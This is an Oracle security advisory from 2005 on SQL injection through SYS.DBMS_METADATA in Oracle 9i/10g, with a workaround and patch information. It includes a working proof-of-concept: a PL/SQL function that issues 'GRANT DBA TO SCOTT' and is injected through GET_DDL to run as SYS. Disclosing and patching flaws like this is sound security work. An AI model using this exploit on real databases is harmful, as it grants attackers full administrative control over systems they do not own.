Services
Oracle Audit / Hardening
Security Training
Consulting

Information
Oracle Security Blog
Published Alerts
Upcoming Alerts
Patch Information
Whitepaper
Presentations
Oracle Fact Sheets
Exploits
Tutorials
Videos
Scripts

News & Events
Events
News

Company
Contact
People
Partner
Impressum
Sitemap


Search



Search Red-Database-Security
SQL Injection via Oracle DBMS_METADATA in Oracle 9i / 10g

Name SQL Injection via Oracle DBMS_METADATA in Oracle 9i / 10g
Systems Affected Oracle 9i / 10g
Severity High Risk
Category SQL Injection
Vendor URL http://www.oracle.com/
Credit Esteban Martinez Fayo (<argeniss>dot<com)
Exploit http://www.argeniss.com
Date 18 Apr 2005 (V 1.00)

Details

The following proof of concept exploit code injects a custom PLSQL function. This function is executed in the SYS context and grants the DBA permission to the user SCOTT.



Workarounds
REVOKE EXECUTE ON SYS.DBMS_METADATA FROM PUBLIC FORCE;


Example
-- Create a function first and inject this function. The function will be executed as user SYS.
CREATE OR REPLACE FUNCTION "SCOTT"."ATTACK_FUNC" return varchar2
authid current_user as
pragma autonomous_transaction;
BEGIN
EXECUTE IMMEDIATE 'GRANT DBA TO SCOTT';
COMMIT;
RETURN '';
END;
/

-- Inject the function in the vulnerable procedure
SELECT SYS.DBMS_METADATA.GET_DDL('''||SCOTT.ATTACK_FUNC()||''','') FROM dual;


Patch Information
Revoke the grants or apply the patches mentioned in Oracle Critical Patch Update April 2005.



2005 by Red-Database-Security GmbH - last update 02-nov-2005

Definition Exploit
An exploit is a common term in the computer security to refer to a piece of software that take advantage of a bug or vulnerability leading to a privilege escalation or d.o.s. on a computer system.
Computer security experts are using exploit code to test if a patch is working properly.